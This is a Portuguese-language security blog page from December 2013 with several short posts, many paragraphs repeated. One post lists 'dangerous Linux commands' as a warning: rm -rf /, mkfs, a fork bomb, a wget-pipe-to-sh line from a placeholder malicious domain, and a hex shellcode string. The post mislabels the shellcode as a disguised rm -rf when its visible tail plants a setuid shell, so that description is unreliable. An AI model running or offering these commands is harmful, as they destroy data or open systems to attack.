Confira o resultado:
Feliz Natal (atrasado) e um próspero Ano Novo, que a Força esteja com vocês em 2014!
sexta-feira, 27 de dezembro de 2013
Desenhando flocos de neve com PostgreSQL
Há pessoas que fazem mágicas tunando consultas e otimizando bancos de dados, mas o pessoal do Explain Extended consegui desenhar flocos de neve com consultas em PostgreSQL.
Confira o resultado:
Feliz Natal (atrasado) e um próspero Ano Novo, que a Força esteja com vocês em 2014!
Confira o resultado:
Feliz Natal (atrasado) e um próspero Ano Novo, que a Força esteja com vocês em 2014!
segunda-feira, 23 de dezembro de 2013
Formiga hacker
Temos um novo inimigo número 1 da eletrônica. Esqueça NSA, Anonymous, BadBIOS, a maior ameaça atual ao mundo digital é a espécie de fomiga hermano-brasileira Nylanderia fulva, a "formiga louca Rasberry".
De acordo com uma matéria do canal History essa espécie de formiga pode invadir "bancos de dados inteiros" e o pior: sem usar SLQ Injection!!
Confira o print:
De acordo com uma matéria do canal History essa espécie de formiga pode invadir "bancos de dados inteiros" e o pior: sem usar SLQ Injection!!
Confira o print:
Vi no Vida de Suporte
NSA melou venda de caças supersônicos para o Brasil
Segundo a agencia de notícias CNBC o fato da NSA ter espionado o Brasil foi um fator determinante para a escolha da sueca Saab como fornecedora dos novos aviões caça supersônicos do Brasil /* Aqueles Mirage não dariam conta nem de uma guerra contra o Uruguai */.
Particularmente achei meio exagero, "há muito mais coisas entre o céu e o governo do que supõe a nossa vã democracia" mas pode ser que tenha alguma relação o fato da americana Boeing ter sido deixada de lado.
Que a Força esteja com vocês nos ares.
Particularmente achei meio exagero, "há muito mais coisas entre o céu e o governo do que supõe a nossa vã democracia" mas pode ser que tenha alguma relação o fato da americana Boeing ter sido deixada de lado.
Que a Força esteja com vocês nos ares.
terça-feira, 17 de dezembro de 2013
Verificando a disponibilidade das aplicações da Google
O "A" de availability "disponibilidade" é um dos 3 pilares da tríade de Segurança da Informação (CIA).
Manter os sistemas "no ar" é uma premissa básica para assegurar a qualidade de qualquer serviço de TI e a indisponibilidade dos serviços pode causar danos sérios à imagem da instituição, além do transtorno inerente que isso gera.
Gigantes da InternetEmpresas que vão dominar o mundo como Google, Skynet, Facebook, Micro$oft, Apple, etc prezam por manter a disponibilidade dos seus serviços, mas nem sempre isso é possível #GFail.
Pensando nisso, aSkynet Google criou um dashboard que mostra o estado atual dos seus principais serviços, inclusive mantendo um histórico das interrupções nos serviços.
É uma boa pedida enviar esse link para aquele usuário chato que coloca a culpa na equipe de TI da empresa ou no squid quando não consegue acessar o email.
Que a Força esteja com vocês!
Manter os sistemas "no ar" é uma premissa básica para assegurar a qualidade de qualquer serviço de TI e a indisponibilidade dos serviços pode causar danos sérios à imagem da instituição, além do transtorno inerente que isso gera.
Gigantes da Internet
 |
| #Gfail Dashboard |
Pensando nisso, a
É uma boa pedida enviar esse link para aquele usuário chato que coloca a culpa na equipe de TI da empresa ou no squid quando não consegue acessar o email.
Que a Força esteja com vocês!
quinta-feira, 12 de dezembro de 2013
5 comandos perigosos no linux (não tente isso em casa)
Olá pessoal,
Uma infinidade de blogs costuma fazer listas de coisas (os 10 melhores não-sei-o-que, top 5 aplicativos para sabe-se-lá-o-que, etc)
Aqui vai uma lista com os comandos mais perigosos do Linux (IMHO):
1-
rm -rf /
Comando comum que apaga todos os seus arquivos nos dispositivos montados.
2-
char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68\x00\x2d\x63\x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";
Mesmo que o 1, mas em hexadecimal.
3-
mkfs.ext3 /dev/sda
Formata o dispositivo montado em /dev/sda.
4-
:(){:|:&};:
Roda tantos processos simultâneos (fork) que faz a máquina travar.
5-
wget http://dominio_malicioso/script -O- | sh
Baixa um script malicioso e o executa após o download.
Que a Força esteja com vocês!
Uma infinidade de blogs costuma fazer listas de coisas (os 10 melhores não-sei-o-que, top 5 aplicativos para sabe-se-lá-o-que, etc)
Aqui vai uma lista com os comandos mais perigosos do Linux (IMHO):
rm -rf /
Comando comum que apaga todos os seus arquivos nos dispositivos montados.
2-
char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68\x00\x2d\x63\x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";
Mesmo que o 1, mas em hexadecimal.
3-
mkfs.ext3 /dev/sda
Formata o dispositivo montado em /dev/sda.
4-
:(){:|:&};:
Roda tantos processos simultâneos (fork) que faz a máquina travar.
5-
wget http://dominio_malicioso/script -O- | sh
Baixa um script malicioso e o executa após o download.
Que a Força esteja com vocês!
quarta-feira, 11 de dezembro de 2013
Business Continuity: Onde estão as empresas do WTC após o 11 de setembro
Eu sei que 11 de setembro já passou faz tempo, mas dias atrás numa lista de discussão que participo, surgiu um tópico sobre Continuidade nos Negócios (ou BCM - Business Continuity Managment).
Existe uma histórialenda urbana hoax que uma empresa tinha um data center em uma das torres e a contingência na outra torre. Aí surgiu a dúvida: o que aconteceu com as empresas do WTC depois do 11 de setembro?
A resposta está no infográfico abaixo:
Fonte: http://money.cnn.com/magazines/fortune/twintowers/
Para finalizar, um link sobre estatísticas e os mitos vs. fatos do BCM e a indicação de 2 cursos /* pagos */ na área /* PS: Não é merchand, é que os cursos são bons mesmos, um deles eu já fiz */
* Imersão na Gestão de Continuidade de Negócios
* BCLP 2000 Business Continuity Professional - DRII
e um software /* também pago */ de gerenciamento de Planos de Contingência e Continuidade de Negócios:
* LDRPS
Que a Força esteja com vocês durante os incidentes!
Existe uma história
A resposta está no infográfico abaixo:
Para finalizar, um link sobre estatísticas e os mitos vs. fatos do BCM e a indicação de 2 cursos /* pagos */ na área /* PS: Não é merchand, é que os cursos são bons mesmos, um deles eu já fiz */
* Imersão na Gestão de Continuidade de Negócios
* BCLP 2000 Business Continuity Professional - DRII
e um software /* também pago */ de gerenciamento de Planos de Contingência e Continuidade de Negócios:
* LDRPS
Que a Força esteja com vocês durante os incidentes!
O Fantástico Gerador de Títulos de Cargos de Segurança da Informação
Depois do Fantástico Gerador de Lero-Lero, presente em tantos trabalhos escolares, e do incrivelmente entediante gerador de títulos absurdamente extensos de artigos científicos de computação e do gerador de nomes de distros Linux, eis que surge um gerador de títulos de cargos de SegInfo.
Com certeza você já ouviu títulos criativos de posições em Segurança, mas se você quer criar um bem criativo para tentar fazer o seu trabalho de controle de acesso ou leitor de logs mais interessante use esse link:
http://zeltser.com/security-titles/
Acho que vou atualizar meu currículo no LinkedIn: "Chief Information Security Operations Specialist"
Com certeza você já ouviu títulos criativos de posições em Segurança, mas se você quer criar um bem criativo para tentar fazer o seu trabalho de controle de acesso ou leitor de logs mais interessante use esse link:
http://zeltser.com/security-titles/
Acho que vou atualizar meu currículo no LinkedIn: "Chief Information Security Operations Specialist"
Sem-teto cria App para iOS e Android
Um sem-teto de Manhattan lançou essa semana um aplicativo para smartphones.
O app, chamado "Tree for Cars" tem um viés ecológico, pois incentiva a prática de "caronas coletivas" indicando quanto CO2 é economizado em cada viagem, sugerindo "caroneiros" próximos, dentre outras utilidades.
O App custa $ 0,99 na AppleStore/PlayStore
O criador, Leo Grand, perdeu o emprego em 2011 e foi despejado. Um certo dia recebeu uma proposta do programador Patrick McConlogue: ganhar 100 dólares ou aprender a programar. Ele escolheu aprender apescar programar em vez de simplesmente pegar o peixe.
Fica a dica: O espírito do Hacking é baseado no conhecimento livre, então, neste final de ano, faça uma boa ação: ensine um Padawan aprogramar fazer algo que você sabe, transfira o conhecimento, for free, escreva uma apostila, faça um tutorial e poste no Youtube, as possibilidades são infinitas.
Fonte: bussinesinsider
O app, chamado "Tree for Cars" tem um viés ecológico, pois incentiva a prática de "caronas coletivas" indicando quanto CO2 é economizado em cada viagem, sugerindo "caroneiros" próximos, dentre outras utilidades.
O App custa $ 0,99 na AppleStore/PlayStore
O criador, Leo Grand, perdeu o emprego em 2011 e foi despejado. Um certo dia recebeu uma proposta do programador Patrick McConlogue: ganhar 100 dólares ou aprender a programar. Ele escolheu aprender a
Fica a dica: O espírito do Hacking é baseado no conhecimento livre, então, neste final de ano, faça uma boa ação: ensine um Padawan a
Fonte: bussinesinsider
Assinar:
Postagens (Atom)